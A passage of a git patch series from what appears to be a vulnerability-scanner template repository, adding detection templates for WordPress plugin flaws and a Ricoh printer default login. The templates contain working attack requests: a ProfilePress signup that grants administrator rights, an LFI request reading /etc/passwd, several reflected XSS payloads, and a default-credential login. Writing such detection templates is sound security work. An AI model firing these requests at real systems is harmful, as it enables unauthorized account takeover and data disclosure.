reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin + tags: cve,cve2021,wordpress,wp-plugin + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: application/json, text/javascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Connection: close + + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_username" + + {{randstr}} + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_email" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_password" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_password_present" + + true + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_first_name" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_last_name" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="_wp_http_referer" + + /wp/?page_id=18 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="pp_current_url" + + {{BaseURL}} + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="wp_capabilities[administrator]" + + 1 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="signup_form_id" + + 1 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="signup_referrer_page" + + + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="action" + + pp_ajax_signup + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="melange_id" + + + -----------------------------138742543134772812001999326589-- + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Connection: close + + action=pp_ajax_login&data=login_username={{randstr}}@example.com&login_password={{randstr}}@example.com + + - | + GET /wp-admin/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection: close + + redirects: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "welcome-panel" + - type: status + status: + - 200 From 983995ba8816d7d5bd26f433faf532e4a238d1bf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 17:03:33 +0000 Subject: [PATCH 0425/4083] Auto Update README [Sat Jul 10 17:03:33 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7f3c7857aa..489624b800 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 387 | vulnerabilities | 214 | exposed-panels | 192 | +| cves | 388 | vulnerabilities | 214 | exposed-panels | 192 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1464 files**. +**127 directories, 1465 files**. From e26b467c76ca75a2f6d6c30d65f944bad1fda88c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 07:22:38 +0700 Subject: [PATCH 0426/4083] Create wp-upsystic-backup-lfi --- .../wordpress/wp-upsystic-backup-lfi | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-upsystic-backup-lfi diff --git a/vulnerabilities/wordpress/wp-upsystic-backup-lfi b/vulnerabilities/wordpress/wp-upsystic-backup-lfi new file mode 100644 index 0000000000..e139fe41b7 --- /dev/null +++ b/vulnerabilities/wordpress/wp-upsystic-backup-lfi @@ -0,0 +1,19 @@ +id: wp-upsystic-backup-lfi + +info: + name: WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/49545 + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd" + + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From 04e5e3005134780a22975f3fe01fe60ecd20ad41 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 07:24:27 +0700 Subject: [PATCH 0427/4083] Update and rename wp-upsystic-backup-lfi to wp-supsystic-backup-lfi --- .../{wp-upsystic-backup-lfi => wp-supsystic-backup-lfi} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/wordpress/{wp-upsystic-backup-lfi => wp-supsystic-backup-lfi} (94%) diff --git a/vulnerabilities/wordpress/wp-upsystic-backup-lfi b/vulnerabilities/wordpress/wp-supsystic-backup-lfi similarity index 94% rename from vulnerabilities/wordpress/wp-upsystic-backup-lfi rename to vulnerabilities/wordpress/wp-supsystic-backup-lfi index e139fe41b7..31828da3e2 100644 --- a/vulnerabilities/wordpress/wp-upsystic-backup-lfi +++ b/vulnerabilities/wordpress/wp-supsystic-backup-lfi @@ -1,4 +1,4 @@ -id: wp-upsystic-backup-lfi +id: wp-supsystic-backup-lfi info: name: WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion From 05bc6366f3c9cfa8c8704b5291c9d16e68725c97 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 07:24:41 +0700 Subject: [PATCH 0428/4083] Rename wp-supsystic-backup-lfi to wp-supsystic-backup-lfi.yaml --- .../{wp-supsystic-backup-lfi => wp-supsystic-backup-lfi.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/wordpress/{wp-supsystic-backup-lfi => wp-supsystic-backup-lfi.yaml} (100%) diff --git a/vulnerabilities/wordpress/wp-supsystic-backup-lfi b/vulnerabilities/wordpress/wp-supsystic-backup-lfi.yaml similarity index 100% rename from vulnerabilities/wordpress/wp-supsystic-backup-lfi rename to vulnerabilities/wordpress/wp-supsystic-backup-lfi.yaml From d0ec1acc7682195a65b3c3248c3b0d642baf48e7 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 07:41:04 +0700 Subject: [PATCH 0429/4083] Create wp-socialfit-xss.yaml --- .../wordpress/wp-socialfit-xss.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-socialfit-xss.yaml diff --git a/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/vulnerabilities/wordpress/wp-socialfit-xss.yaml new file mode 100644 index 0000000000..c91895ce84 --- /dev/null +++ b/vulnerabilities/wordpress/wp-socialfit-xss.yaml @@ -0,0 +1,29 @@ +id: wp-socialfit-xss + +info: + name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting + author: daffainfo + severity: medium + description: | + SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + reference: | + - https://www.exploit-db.com/exploits/37481 + tags: wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 From da45bdf0ef7f6344e24ab7f0cd63fc17cb10ecf3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 07:58:31 +0700 Subject: [PATCH 0430/4083] Create CVE-2020-29395.yaml --- cves/2020/CVE-2020-29395.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-29395.yaml diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml new file mode 100644 index 0000000000..3ca51b9f45 --- /dev/null +++ b/cves/2020/CVE-2020-29395.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-29395 + +info: + name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-29395 + tags: cve,cve2020,wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4889efb11742db61ea79f838ae99f8a82e8f59a5 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 08:06:14 +0700 Subject: [PATCH 0431/4083] Create CVE-2019-14470.yaml --- cves/2019/CVE-2019-14470.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-14470.yaml diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml new file mode 100644 index 0000000000..98968d2354 --- /dev/null +++ b/cves/2019/CVE-2019-14470.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-14470 + +info: + name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 + tags: cve,cve2019,wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 009e68c6275892b46baf7433ae0daedca3286aec Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 08:20:03 +0700 Subject: [PATCH 0432/4083] Create CVE-2019-15889.yaml --- cves/2019/CVE-2019-15889.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-15889.yaml diff --git a/cves/2019/CVE-2019-15889.yaml b/cves/2019/CVE-2019-15889.yaml new file mode 100644 index 0000000000..1c081888a3 --- /dev/null +++ b/cves/2019/CVE-2019-15889.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-15889 + +info: + name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 + tags: cve,cve2019,wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4773149878664beb4fb0ef9ac47b78a3f172b5fd Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 08:43:01 +0700 Subject: [PATCH 0433/4083] Create CVE-2014-9094.yaml --- cves/2014/CVE-2014-9094.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2014/CVE-2014-9094.yaml diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml new file mode 100644 index 0000000000..52ae09f18d --- /dev/null +++ b/cves/2014/CVE-2014-9094.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,2014,wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 53c2c47099bd119965368c2a585acbd628b0399c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 09:00:15 +0700 Subject: [PATCH 0434/4083] Create CVE-2013-3526.yaml --- cves/2013/CVE-2013-3526.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2013/CVE-2013-3526.yaml diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml new file mode 100644 index 0000000000..5f18466bcd --- /dev/null +++ b/cves/2013/CVE-2013-3526.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-3526 + +info: + name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 + tags: cve,cve2013,wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From ab85fd5ebaf811f66c7bc3b733f61299253ac406 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 09:10:35 +0700 Subject: [PATCH 0435/4083] Create wp-securimage-xss.yaml --- .../wordpress/wp-securimage-xss.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-securimage-xss.yaml diff --git a/vulnerabilities/wordpress/wp-securimage-xss.yaml b/vulnerabilities/wordpress/wp-securimage-xss.yaml new file mode 100644 index 0000000000..8acf6d6f91 --- /dev/null +++ b/vulnerabilities/wordpress/wp-securimage-xss.yaml @@ -0,0 +1,29 @@ +id: wp-securimage-xss + +info: + name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/59816/info + tags: wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From cc165287fd45e71ce639cc7c8431a89b43b3830e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 09:16:13 +0700 Subject: [PATCH 0436/4083] Create wp-ambience-xss.yaml --- .../wordpress/wp-ambience-xss.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-ambience-xss.yaml diff --git a/vulnerabilities/wordpress/wp-ambience-xss.yaml b/vulnerabilities/wordpress/wp-ambience-xss.yaml new file mode 100644 index 0000000000..1ab11fe44e --- /dev/null +++ b/vulnerabilities/wordpress/wp-ambience-xss.yaml @@ -0,0 +1,29 @@ +id: wp-ambience-xss + +info: + name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/38568 + tags: wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From adc16e4bdfb637e018cac986b4dec4caa5e927f5 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 11 Jul 2021 13:26:49 +0900 Subject: [PATCH 0437/4083] Create ricoh-weak-password.yaml Signed-off-by: GwanYeong Kim --- default-logins/ricoh/ricoh-weak-password.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 default-logins/ricoh/ricoh-weak-password.yaml diff --git a/default-logins/ricoh/ricoh-weak-password.yaml b/default-logins/ricoh/ricoh-weak-password.yaml new file mode 100644 index 0000000000..a7db0ce8a6 --- /dev/null +++ b/default-logins/ricoh/ricoh-weak-password.yaml @@ -0,0 +1,28 @@ +id: ricoh-weak-password + +info: + name: Ricoh Weak Password + author: gy741 + severity: high + tags: ricoh,default-login + reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ + +requests: + - raw: + - | + POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: cookieOnOffChecker=on; + + wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open= + + matchers-condition: and + matchers: + - type: regex + regex: + - 'wimsesid=[0-9]+' + part: header + + - type: status + status: + - 302 From b1f755466ba13f947ff73f2a8b0ece08ea7d7a67 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Jul 2021 09:57:44 +0530 Subject: [PATCH 0438/4083] Update wp-ambience-xss.yaml --- vulnerabilities/wordpress/wp-ambience-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-ambience-xss.yaml b/vulnerabilities/wordpress/wp-ambience-xss.yaml index 1ab11fe44e..84fb6e9506 100644 --- a/vulnerabilities/wordpress/wp-ambience-xss.yaml +++ b/vulnerabilities/wordpress/wp-ambience-xss.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium reference: https://www.exploit-db.com/exploits/38568 - tags: wordpress,xss + tags: wordpress,xss,wp-plugin requests: - method: GET From a37b3872a7489cccf99d8f5a724c972b0d95cd00 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Jul 2021 04:31:38 +0000 Subject: [PATCH 0439/4083] Auto Update README [Sun Jul 11 04:31:38 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 489624b800..3b8af9334b 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 388 | vulnerabilities | 214 | exposed-panels | 192 | +| cves | 388 | vulnerabilities | 215 | exposed-panels | 192 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1465 files**. +**127 directories, 1466 files**. From b830f86384e6e38a502c1d0206c9885055a00e42 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Jul 2021 10:02:30 +0530 Subject: [PATCH 0440/4083] Update wp-securimage-xss.yaml --- vulnerabilities/wordpress/wp-securimage-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-securimage-xss.yaml b/vulnerabilities/wordpress/wp-securimage-xss.yaml index 8acf6d6f91..a7d4a9d1c1 100644 --- a/vulnerabilities/wordpress/wp-securimage-xss.yaml +++ b/vulnerabilities/wordpress/wp-securimage-xss.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium reference: https://www.securityfocus.com/bid/59816/info - tags: wordpress,xss + tags: wordpress,xss,wp-plugin requests: - method: GET From 92e1a5feeb757187a31d7d0326d76f6a859fac39 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Jul 2021 10:05:10 +0530 Subject: [PATCH 0441/4083] Update CVE-2013-3526.yaml --- cves/2013/CVE-2013-3526.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml index 5f18466bcd..b081219b53 100644 --- a/cves/2013/CVE-2013-3526.yaml +++ b/cves/2013/CVE-2013-3526.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 - tags: cve,cve2013,wordpress,xss + tags: cve,cve2013,wordpress,xss,wp-plugin requests: - method: GET From 0a152455128f8ead8d63e6af8edc9757c5403723 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Jul 2021 04:38:18 +0000 Subject: [PATCH 0442/4083] Auto Update README [Sun Jul 11 04:38:18 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 3b8af9334b..078511d5ee 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 388 | vulnerabilities | 215 | exposed-panels | 192 | +| cves | 389 | vulnerabilities | 216 | exposed-panels | 192 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1466 files**. +**127 directories, 1468 files**. From a04341ae203e1eee5436f3c706b9f8a290607b7c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Jul 2021 10:08:53 +0530 Subject: [PATCH 0443/4083] Update CVE-2014-9094.yaml --- cves/2014/CVE-2014-9094.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 52ae09f18d..81ae8ce817 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - tags: cve,2014,wordpress,xss + tags: cve,2014,wordpress,xss,wp-plugin requests: - method: GET From 7a3acbcc25ce68d58ad96a1383ef28db6b28c676 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Jul 2021 04:39:16 +0000 Subject: [PATCH 0444/4083] Auto Update README [Sun Jul 11 04:39:16 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 078511d5ee..b04c7a3754 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 389 | vulnerabilities | 216 | exposed-panels | 192 | +| cves | 390 | vulnerabilities | 216 | exposed-panels | 192 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1468 files**. +**127 directories, 1469 files**. From 0bae5e975eff9c6b661b5286d4ce815750a192c1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Jul 2021 10:09:51 +0530 Subject: [PATCH 0445/4083] Update CVE-2019-15889.yaml --- cves/2019/CVE-2019-15889.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-15889.yaml b/cves/2019/CVE-2019-15889.yaml index 1c081888a3..0f46219cb3 100644 --- a/cves/2019/CVE-2019-15889.yaml +++ b/cves/2019/CVE-2019-15889.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 - tags: cve,cve2019,wordpress,xss + tags: cve,cve2019,wordpress,xss,wp-plugin requests: - method: GET From e8288bae1219f4c89684a2b59cc7870c29fc6001 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Jul 2021 04:40:15 +0000 Subject: [PATCH 0446/4083] Auto Update README [Sun Jul 11 04:40:15 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b04c7a3754..6fe4d274c9 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 390 | vulnerabilities | 216 | exposed-panels | 192 | +| cves | 391 | vulnerabilities | 216 | exposed-panels | 192 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1469 files**. +**127 directories, 1470 files**. From 7c0c5033e94fc3969f23649d282bffb18008d622 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Jul 2021 10:11:11 +0530 Subject: [PATCH 0447/4083] Update CVE-2019-14470.yaml --- cves/2019/CVE-2019-14470.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 98968d2354..d04640d019 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 - tags: cve,cve2019,wordpress,xss + tags: cve,cve2019,wordpress,xss,wp-plugin requests: - method: GET From 7c19ca873dc555962b00d7f3bbc396093857f91c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Jul 2021 10:12:41 +0530 Subject: [PATCH 0448/4083] Update CVE-2019-14470.yaml --- cves/2019/CVE-2019-14470.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index d04640d019..291551f948 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -4,7 +4,9 @@ info: name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 + reference: | + - https://wpscan.com/vulnerability/9815 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 tags: cve,cve2019,wordpress,xss,wp-plugin requests: From 7f0f8beff28d3fb150c5449ab94fba3f9c8d7641 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Jul 2021 10:14:56 +0530 Subject: [PATCH 0449/4083] Update CVE-2020-29395.yaml --- cves/2020/CVE-2020-29395.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml index 3ca51b9f45..2de1016d50 100644 --- a/cves/2020/CVE-2020-29395.yaml +++ b/cves/2020/CVE-2020-29395.yaml @@ -4,8 +4,10 @@ info: name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-29395 - tags: cve,cve2020,wordpress,xss + reference: | + - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS + - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 + tags: cve,cve2020,wordpress,xss,wp-plugin requests: - method: GET From a95e5d45d9dbadec071681d0d99c893493627a64 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Jul 2021 04:45:25 +0000 Subject: [PATCH 0450/4083] Auto Update README [Sun Jul 11 04:45:25 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6fe4d274c9..ef3943ac47 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 391 | vulnerabilities | 216 | exposed-panels | 192 | +| cves | 392 | vulnerabilities | 216 | exposed-panels | 192 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1470 files**. +**127 directories, 1471 files**. From 361a641483e33c3f3a527038ef44510470564ee6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: 